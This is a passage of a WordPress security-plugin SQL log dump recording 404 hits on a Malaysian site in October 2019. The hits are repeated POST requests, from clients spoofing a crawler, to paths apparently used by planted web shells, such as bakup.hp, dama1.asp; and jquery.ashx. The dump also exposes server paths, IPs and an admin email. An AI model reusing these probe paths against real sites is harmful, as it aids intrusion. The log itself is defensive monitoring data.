17:15:08',35337160,37136264,'http://bintara.com.my//ctwet/md5.ph',1,0,'210.31.67.149'),(28306,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"//ctwet/md5.ph\";s:14:\"CONTENT_LENGTH\";s:3:\"683\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.100.132.66\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.100.132.66\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"http://bintara.com.my/ctwet/md5.ph\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/ctwet/md5.ph\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanzJN@tMXWkyeodXCWLpAAAAYw\";s:12:\"REDIRECT_URL\";s:13:\"/ctwet/md5.ph\";s:11:\"REMOTE_ADDR\";s:13:\"27.31.102.111\";s:11:\"REMOTE_PORT\";s:5:\"52386\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"http://bintara.com.my/ctwet/md5.ph\";s:10:\"SCRIPT_URL\";s:13:\"/ctwet/md5.ph\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanzJN@tMXWkyeodXCWLpAAAAYw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571418916.189\";s:12:\"REQUEST_TIME\";s:10:\"1571418916\";}}','notice','2019-10-18 17:15:18','2019-10-18 17:15:16',35268976,37075304,'http://bintara.com.my//ctwet/md5.ph',1,0,'211.100.132.66'),(28307,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//plus/bakup.hp\";s:14:\"CONTENT_LENGTH\";s:3:\"297\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"61.128.105.100\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"61.128.105.100\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/plus/bakup.hp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/bakup.hp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanzOKKgLwuFCg2LGPQdagAAAcg\";s:12:\"REDIRECT_URL\";s:14:\"/plus/bakup.hp\";s:11:\"REMOTE_ADDR\";s:13:\"27.31.102.111\";s:11:\"REMOTE_PORT\";s:5:\"52943\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/plus/bakup.hp\";s:10:\"SCRIPT_URL\";s:14:\"/plus/bakup.hp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanzOKKgLwuFCg2LGPQdagAAAcg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418937.0496\";s:12:\"REQUEST_TIME\";s:10:\"1571418937\";}}','notice','2019-10-18 17:15:39','2019-10-18 17:15:37',35261648,37068280,'http://bintara.com.my//plus/bakup.hp',1,0,'61.128.105.100');
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (28308,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//plus/bakup.hp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.93.148.225\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.93.148.225\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/plus/bakup.hp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/bakup.hp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanzQ8H0ANMsr0w2B2wxsgAAAQA\";s:12:\"REDIRECT_URL\";s:14:\"/plus/bakup.hp\";s:11:\"REMOTE_ADDR\";s:13:\"27.31.102.111\";s:11:\"REMOTE_PORT\";s:5:\"53170\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/plus/bakup.hp\";s:10:\"SCRIPT_URL\";s:14:\"/plus/bakup.hp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanzQ8H0ANMsr0w2B2wxsgAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418947.5713\";s:12:\"REQUEST_TIME\";s:10:\"1571418947\";}}','notice','2019-10-18 17:15:49','2019-10-18 17:15:47',35338560,37146864,'http://bintara.com.my//plus/bakup.hp',1,0,'211.93.148.225'),(28309,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//plus/bakup.hp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"222.33.228.91\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"222.33.228.91\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/plus/bakup.hp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/bakup.hp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanzVMDvTLQMcXIRTTl0fAAAAhc\";s:12:\"REDIRECT_URL\";s:14:\"/plus/bakup.hp\";s:11:\"REMOTE_ADDR\";s:14:\"171.80.159.120\";s:11:\"REMOTE_PORT\";s:5:\"53845\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/plus/bakup.hp\";s:10:\"SCRIPT_URL\";s:14:\"/plus/bakup.hp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanzVMDvTLQMcXIRTTl0fAAAAhc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571418964.7641\";s:12:\"REQUEST_TIME\";s:10:\"1571418964\";}}','notice','2019-10-18 17:16:07','2019-10-18 17:16:05',35262160,37068280,'http://bintara.com.my//plus/bakup.hp',1,0,'222.33.228.91'),(28310,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//user/cache.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.194.190.18\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.194.190.18\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/user/cache.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/user/cache.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanzkAVftBBpAv@TWWu8XwAAAFg\";s:12:\"REDIRECT_URL\";s:15:\"/user/cache.asp\";s:11:\"REMOTE_ADDR\";s:14:\"171.80.159.120\";s:11:\"REMOTE_PORT\";s:5:\"55662\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/user/cache.asp\";s:10:\"SCRIPT_URL\";s:15:\"/user/cache.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanzkAVftBBpAv@TWWu8XwAAAFg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419024.8399\";s:12:\"REQUEST_TIME\";s:10:\"1571419024\";}}','notice','2019-10-18 17:17:06','2019-10-18 17:17:05',35265976,37063416,'http://bintara.com.my//user/cache.asp',1,0,'220.194.190.18'),(28311,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//js/jquery.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"218.106.130.67\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"218.106.130.67\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/js/jquery.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/js/jquery.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XanzmQVftBBpAv@TWWu8YwAAAE8\";s:12:\"REDIRECT_URL\";s:15:\"/js/jquery.ashx\";s:11:\"REMOTE_ADDR\";s:14:\"171.80.159.120\";s:11:\"REMOTE_PORT\";s:5:\"55985\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/js/jquery.ashx\";s:10:\"SCRIPT_URL\";s:15:\"/js/jquery.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XanzmQVftBBpAv@TWWu8YwAAAE8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419033.5678\";s:12:\"REQUEST_TIME\";s:10:\"1571419033\";}}','notice','2019-10-18 17:17:15','2019-10-18 17:17:14',35262136,37072040,'http://bintara.com.my//js/jquery.ashx',1,0,'218.106.130.67'),(28312,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//js/jquery.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"203.100.34.24\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"203.100.34.24\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/js/jquery.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/js/jquery.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xanzq8DvTLQMcXIRTTl0mQAAAgU\";s:12:\"REDIRECT_URL\";s:15:\"/js/jquery.ashx\";s:11:\"REMOTE_ADDR\";s:14:\"171.80.159.120\";s:11:\"REMOTE_PORT\";s:5:\"56609\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/js/jquery.ashx\";s:10:\"SCRIPT_URL\";s:15:\"/js/jquery.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xanzq8DvTLQMcXIRTTl0mQAAAgU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419053.4933\";s:12:\"REQUEST_TIME\";s:10:\"1571419053\";}}','notice','2019-10-18 17:17:36','2019-10-18 17:17:34',35339632,37148896,'http://bintara.com.my//js/jquery.ashx',1,0,'203.100.34.24'),(28313,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"//dama1.asp;\";s:14:\"CONTENT_LENGTH\";s:3:\"820\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"125.44.232.24\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"125.44.232.24\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"http://bintara.com.my/dama1.asp;\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/dama1.asp;\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan0DQVftBBpAv@TWWu8wgAAAEQ\";s:12:\"REDIRECT_URL\";s:11:\"/dama1.asp;\";s:11:\"REMOTE_ADDR\";s:13:\"36.62.243.240\";s:11:\"REMOTE_PORT\";s:5:\"59180\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"http://bintara.com.my/dama1.asp;\";s:10:\"SCRIPT_URL\";s:11:\"/dama1.asp;\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan0DQVftBBpAv@TWWu8wgAAAEQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571419149.825\";s:12:\"REQUEST_TIME\";s:10:\"1571419149\";}}','notice','2019-10-18 17:19:12','2019-10-18 17:19:10',35338600,37140768,'http://bintara.com.my//dama1.asp;',1,0,'125.44.232.24'),(28314,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"//dama1.asp;\";s:14:\"CONTENT_LENGTH\";s:3:\"685\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"121.36.84.19\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"121.36.84.19\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"http://bintara.com.my/dama1.asp;\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/dama1.asp;\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xan0FAVftBBpAv@TWWu8xwAAAE0\";s:12:\"REDIRECT_URL\";s:11:\"/dama1.asp;\";s:11:\"REMOTE_ADDR\";s:13:\"36.62.243.240\";s:11:\"REMOTE_PORT\";s:5:\"59373\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"http://bintara.com.my/dama1.asp;\";s:10:\"SCRIPT_URL\";s:11:\"/dama1.asp;\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xan0FAVftBBpAv@TWWu8xwAAAE0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571419156.4338\";s:12:\"REQUEST_TIME\";s:10:\"1571419156\";}}','notice','2019-10-18 17:19:18','2019-10-18 17:19:16',35268344,37080368,'http://bintara.com.my//dama1.asp;',1,0,'121.36.84.19'),(28315,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//inc/config.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 